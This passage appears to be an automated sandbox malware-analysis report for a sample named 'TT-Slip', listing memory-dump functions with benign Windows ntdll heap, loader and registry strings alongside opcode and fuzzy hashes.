Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0168D262
Control Panel\Desktop\LanguageConfiguration, xrefs: 0168D196
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0168D146
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0168D0CF
@, xrefs: 0168D313

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 06f55d746d5fe2c4e29fe52f5e1a7589725993880896fce408ee6d0f445c34d3
Instruction ID: 70e6eed686217491d55d903c0bbce16b7819dce46ebfa06fe90df8f042085596
Opcode Fuzzy Hash: 06f55d746d5fe2c4e29fe52f5e1a7589725993880896fce408ee6d0f445c34d3
Instruction Fuzzy Hash: 09A18F719083069FE721DF64CC94B6BB7E8BF94715F004A2EF68997280D774D908CBA2

Function 0168F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 016EE3A9
(LONG)FreeEntry->Size > 1, xrefs: 016EE291
((LONG)FreeEntry->Size > 1), xrefs: 016EE0B3
(UCRBlock != NULL), xrefs: 016EDF6F
HEAP: , xrefs: 016EDF64, 016EE0A8, 016EE286, 016EE39E
HEAP[%wZ]: , xrefs: 016EDF57, 016EE09B, 016EE279, 016EE391

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 437d57c6de6a5913a2fde7b92cad5b72f418c1c3c867868d00e901c331dc48c3
Instruction ID: 2521e30a9320a8b308b540bcb8496b095f138f3d7ae7b71902ffb5fe621be9a4
Opcode Fuzzy Hash: 437d57c6de6a5913a2fde7b92cad5b72f418c1c3c867868d00e901c331dc48c3
Instruction Fuzzy Hash: 9A42F3312057829FD715EF68CC98A6ABBE5FF88704F148AADF4868B352D730D841CB52

Function 016AB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

SxS, xrefs: 016F83ED
LdrpPreprocessDllName, xrefs: 016F8403, 016F84D7
DLL %wZ was redirected to %wZ by %s, xrefs: 016F83FC
minkernel\ntdll\ldrutil.c, xrefs: 016F840D, 016F84E1
API set, xrefs: 016F83F4, 016F83F9
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 016F84D0

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: cc043b6d982f1f44de4c071aca7356bca2b93385bb996fe603fe3f8318beaa8c
Instruction ID: acae87370e8939f96220050bd2b25990d13bd471516ae5146dda3ecfe23c4057
Opcode Fuzzy Hash: cc043b6d982f1f44de4c071aca7356bca2b93385bb996fe603fe3f8318beaa8c
Instruction Fuzzy Hash: F9C16A31A01215ABDB258F68CC80BBEBBA9FF45310F5481ADEE029B391DB74DD45CB90

Function 016C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017041FE
Delaying execution failed with status 0x%08lx, xrefs: 01704258
minkernel\ntdll\ldrinit.c, xrefs: 017040E9, 0170414B, 0170420F, 01704269
Process initialization failed with status 0x%08lx, xrefs: 0170413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017040D8
_LdrpInitialize, xrefs: 017040DF, 01704141, 01704205, 0170425F

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
Instruction ID: bc85aa46e0e3e93060ec262a30cf2ffc0582f7010298ea843f16e9a5eeb32669
Opcode Fuzzy Hash: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
Instruction Fuzzy Hash: F591F370B41315DBEB26DF18DC94BAEFBE1EB50B24F24812CEA066B385D7609842C795

Function 0173F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0173F7BE
HEAP: , xrefs: 0173F6F4, 0173F7A1, 0173F7F8
RtlAllocateHeap, xrefs: 0173F56D
HEAP[%wZ]: , xrefs: 0173F6E7, 0173F794, 0173F7EB
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0173F809
Just allocated block at %p for %Ix bytes, xrefs: 0173F708

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 606aef241178eb38a1521dfa161119e3be81250aa85cd01284fc4c3319cdd388
Instruction ID: 042b8f942e74350ab9f7684fc8e19b3a16e1e16b0eda655eb6a3f3ea0fb13c0b
Opcode Fuzzy Hash: 606aef241178eb38a1521dfa161119e3be81250aa85cd01284fc4c3319cdd388
Instruction Fuzzy Hash: 47911131D00642DFDB26EF68C840AADFBF2FF99B50F18805DE4469B262C7759840CB19

Function 0168645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 016E9A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016E9A2A
LdrpInitShimEngine, xrefs: 016E99F4, 016E9A07, 016E9A30
apphelp.dll, xrefs: 01686496
minkernel\ntdll\ldrinit.c, xrefs: 016E9A11, 016E9A3A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016E99ED

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
Instruction ID: 5e8fd23b264cac80f9e4b57ff15bb55df8a5dc493e0fddd517432a5a19bd9c81
Opcode Fuzzy Hash: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
Instruction Fuzzy Hash: BE51B0712483019BD720EF28DC85AAB77E5EF84B58F104A1DE98697250DB30E945CB92

Function 016BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0170031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017002E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017002BD

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
Instruction ID: 0a702d95f2a747d67b1d1c3d2254a63b24a74c900a385798a130b2930f35e34b
Opcode Fuzzy Hash: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
Instruction Fuzzy Hash: B4E19D30608741DFD726CF28CC84B6ABBE1BB84364F144AADF5A58B2E1D774D985CB42

Function 016B51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 016B5352
Kernel-MUI-Number-Allowed, xrefs: 016B5247
Kernel-MUI-Language-SKU, xrefs: 016B542B
Kernel-MUI-Language-Allowed, xrefs: 016B527B
WindowsExcludedProcs, xrefs: 016B522A

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: a66403250150d33b9bfa10deaa85fe32a6757807a675503e747debff403f7369
Instruction ID: 039b1d63ee0095dae71769a310d2531f1ed64ab9bf1ed94f5268aa6cb4752112
Opcode Fuzzy Hash: a66403250150d33b9bfa10deaa85fe32a6757807a675503e747debff403f7369
Instruction Fuzzy Hash: 53F13C72D11219EFDB12DFA8CD80AEEBBB9FF58650F15406AE502E7310E7749E418B90

Function 016A70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 016A7C7C, 016A867F
HEAP[%wZ]: , xrefs: 016A7C6D, 016A8670
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 016A7C96, 016A8696

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 6046e00e36165c2d85c1906cfddea43052c7e4fb60a57d54f84cf70e266ed212
Instruction ID: 634c0646239b66ab375d2eaaa91411ef733ce32c352b1a5c5576839f3de1044a
Opcode Fuzzy Hash: 6046e00e36165c2d85c1906cfddea43052c7e4fb60a57d54f84cf70e266ed212
Instruction Fuzzy Hash: CD13AB70A00256CFEB25CF68C8907A9BBF5FF49304F5481A9D949AB382D735AD42CF90

Function 016A1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 016F588F
HEAP: , xrefs: 016F5884
HEAP[%wZ]: , xrefs: 016F5877
@, xrefs: 016F5A53

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 551588e53160db04964f512586f0b9bb616f17af534c494f5499e7c4097d9325
Instruction ID: 5f9c699f049d144db5b11f0862ae89e54eb0dc5ac7096f0a6384a8e0802848db
Opcode Fuzzy Hash: 551588e53160db04964f512586f0b9bb616f17af534c494f5499e7c4097d9325
Instruction Fuzzy Hash: 29926971A01229CFEB25CF18CC50BA9B7B6BF46314F1581EAE94AA7391D7309E81CF51

Function 0169A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 0169A3FF
6, xrefs: 0169A3F7
LdrResFallbackLangList Enter, xrefs: 0169A3EF
8, xrefs: 0169A3E7

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
Instruction ID: 749931eb6261348640c2b407ede81ec08aecd34aaacbc5cf0d643c41de7af8df
Opcode Fuzzy Hash: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
Instruction Fuzzy Hash: 8DC16A752083828FDB11CF98C944B6AB7E8BF85704F04896EF9958B351E734C94ACB96

Function 016B15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 016FA590
MZER, xrefs: 016B16E8
Could not validate the crypto signature for DLL %wZ, xrefs: 016FA589
minkernel\ntdll\ldrmap.c, xrefs: 016FA59A

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: ea5c04da94385d424fa72da0d004b6078bbb4549d3a0aaeb969f3ba4cb3cc461
Instruction ID: 1a4665e39843d8c1d6911450a938f4747ca21b384150cfba8522454af2a48d9d
Opcode Fuzzy Hash: ea5c04da94385d424fa72da0d004b6078bbb4549d3a0aaeb969f3ba4cb3cc461
Instruction Fuzzy Hash: 9E513770600745EBE722DB9CDD98BA6BBE4BF02724F180199EB559B3D2E730E881C740

Function 017411A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 017412D6
HEAP: , xrefs: 0174124A, 0174125D, 0174125F, 017412C4
HEAP[%wZ]: , xrefs: 0174123D, 017412B7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01741261

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 2d6aff06906896ace1e85ddd86d32c5f729acb6895857edaff183a89b49ae2b6
Instruction ID: 37cf70f502a4e1307e387254083c48b6dfcce1b98155cfc2a724f434ba1bf9ed
Opcode Fuzzy Hash: 2d6aff06906896ace1e85ddd86d32c5f729acb6895857edaff183a89b49ae2b6
Instruction Fuzzy Hash: 67310171304210EFDB11EB98CC85F6AB7E9EF06660F544199F542CB2A1E770AD80CA68

Function 016B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016FA992
LdrpDynamicShimModule, xrefs: 016FA998
apphelp.dll, xrefs: 016B2462
minkernel\ntdll\ldrinit.c, xrefs: 016FA9A2

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
Instruction ID: 9268dca700a3cd38aeec3a275a9a319621abca1225f80436411a789fb84b38eb
Opcode Fuzzy Hash: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
Instruction Fuzzy Hash: B0318D71690201EBDB319F9DCC84EAEBBB5FB80B20F25406DFA056B345C770A982C790

Function 01689148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 016EBABA
VirtualQuery Failed 0x%p %x, xrefs: 016EBAF7
HEAP: , xrefs: 016EBAAD, 016EBAEA
HEAP[%wZ]: , xrefs: 016EBAA0, 016EBADD

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 4fd1d4b5c4dd5833db6e3d28a06d58363d201992e54d67d2508006734a5fe073
Instruction ID: 473037dc73a659113cccef696d9439480c83ce6ad7364ca8339d86faeb62f3b9
Opcode Fuzzy Hash: 4fd1d4b5c4dd5833db6e3d28a06d58363d201992e54d67d2508006734a5fe073
Instruction Fuzzy Hash: 61310432600105EFCB01EF49CC89FAAB7FDEF45B65F1442A9E911AB290D770ED40CA64

Function 01691460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01691596
HEAP[%wZ]: , xrefs: 01691712
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01691728

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 872dffa0dfded51b3cf7fce65b85afe2b4fde09588158c8e7cf8514b8b6a53a7
Instruction ID: 6897c919c98affa67a98be1eedb5afb351b6d66be83c6104b16c8e20e5e6502e
Opcode Fuzzy Hash: 872dffa0dfded51b3cf7fce65b85afe2b4fde09588158c8e7cf8514b8b6a53a7
Instruction Fuzzy Hash: 58E11170A042529FDF25CF28C844B7ABBF9AF4A320F28859DE596CB346D734E941CB50

Function 0168A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 016EC1E4
FilterFullPath, xrefs: 016EC2E6
UseFilter, xrefs: 0168A1C1

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
Instruction ID: 0186883dd15d79262ae07372c4694133bf1efb66950b707a742d159e8f267638
Opcode Fuzzy Hash: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
Instruction Fuzzy Hash: CBA19F71D112299BDB31DF68CC98BEAB7B9EF48700F1042EAD909A7210D7359E84CF54

Function 0169B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Exit, xrefs: 0169B477
{, xrefs: 016F37B6
LdrpResGetResourceDirectory Enter, xrefs: 0169B465

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: cb71bbbe687d2ef49f850b0e4b6b66dcdedf7a4eaa6820fc3b3a58a694cb047b
Instruction ID: 9f4b6334c1adf1afc0b4d0d3283956e679677d5b1c291e08bfea15528fcbcc07
Opcode Fuzzy Hash: cb71bbbe687d2ef49f850b0e4b6b66dcdedf7a4eaa6820fc3b3a58a694cb047b
Instruction Fuzzy Hash: 3491D071A05259CFEF21CF58ED40BAEBBB9FF01724F144199E911AB390D378A941CB94

Function 016C909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 01705D3F
@, xrefs: 016C9148
&, xrefs: 01705CF8

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 05d0f2c174dc0a1ed0fbe802a980c1ce0deb9c73e78258757170864b29dd9cb7
Instruction ID: af0dcd74825f6dc1257eafa902aef02fb9238057693c5ef41cd045cf554d4de9
Opcode Fuzzy Hash: 05d0f2c174dc0a1ed0fbe802a980c1ce0deb9c73e78258757170864b29dd9cb7
Instruction Fuzzy Hash: 47719D705083429FC715DF28C984A2BFBE6FF85B18F108A1DE5DA87691C731D906CB96

Function 0168758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 016EAFB8
HEAP[%wZ]: , xrefs: 016EAFAB
Invalid address specified to %s( %p, %p ), xrefs: 016EAFCB

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 5c8e103189f9d041cd7a4626f65ca3ef5b7bca4a22ae240866394805fa729761
Instruction ID: 67579abf50738ef89e9dbf689ee047e518232a0d215c48c01788198221019cfb
Opcode Fuzzy Hash: 5c8e103189f9d041cd7a4626f65ca3ef5b7bca4a22ae240866394805fa729761
Instruction Fuzzy Hash: 3741E3702012908FEF25EB9ECC987797BE19F02348F2887A9D5468B396D764D886C751

Function 0174C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0174C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0174C1C5
@, xrefs: 0174C1F1

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
Instruction ID: 36971d03688b40f10ff2bc8c65a037d35e6cabd24097ee402ef57c312aaca97b
Opcode Fuzzy Hash: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
Instruction Fuzzy Hash: A6418571E05219EBDB12DED9CC51FEEFBB9BB14704F00416AE605B7240D7B49A44CB54

Function 01724144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01724172
LdrpResValidateFilePath Enter, xrefs: 01724160
@, xrefs: 01724225

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
Instruction ID: af9829de1c5f913aa99d517c871c9aa6502ac86073813ddc44b1dab13ad4c1df
Opcode Fuzzy Hash: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
Instruction Fuzzy Hash: 6A41E232A04268CBEB26DBD9CC44BADFBF9FF56340F240459D902EB781D6748902CB51

Function 016C33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 017029FE
Actx , xrefs: 016C33AC
RtlCreateActivationContext, xrefs: 017029F9

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 28c834a15066a48e7d1a9dac50e5cdd4d4b7f4413e2d05e7208c1e0e7bfb6d2d
Instruction ID: 82745b3188f82739f5fddb37a3305560d782a267e6c7cbec4922f128a3bcdcc3
Opcode Fuzzy Hash: 28c834a15066a48e7d1a9dac50e5cdd4d4b7f4413e2d05e7208c1e0e7bfb6d2d
Instruction Fuzzy Hash: BE3100326013019BEB22DE58DC84BAABBA9FB44B10F05C46DEE059F386CB34D945CB90

Function 0171B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 0171B670
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0171B632
GlobalFlag, xrefs: 0171B68F

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 7ea8d124463dd2594db9635eb5a23faeecc6ce8392df3c46eb0ac23120eb3fcd
Instruction ID: 3429f13706482cf25a34f5b7f2ac8637981341f6d547656b2e040ff25a49063b
Opcode Fuzzy Hash: 7ea8d124463dd2594db9635eb5a23faeecc6ce8392df3c46eb0ac23120eb3fcd
Instruction Fuzzy Hash: 11314DB1E00209AFDB10EFA9CC90AEEBB7DEF54744F1444ADE605A7254D7749E00CBA4

Function 016D1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 016D127B
@, xrefs: 016D12A5
BuildLabEx, xrefs: 016D130F

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: c75f28ab6444deaf46feb876d968ccea21b09421940cba94fdbff8d977ff5758
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 7B31A172D00219AFDB11DFA5CC44EAFBBBEEB95714F004029E604A72A0DB709A058B94

Function 017120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 017120FA
minkernel\ntdll\ldrinit.c, xrefs: 01712104
Process initialization failed with status 0x%08lx, xrefs: 017120F3

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
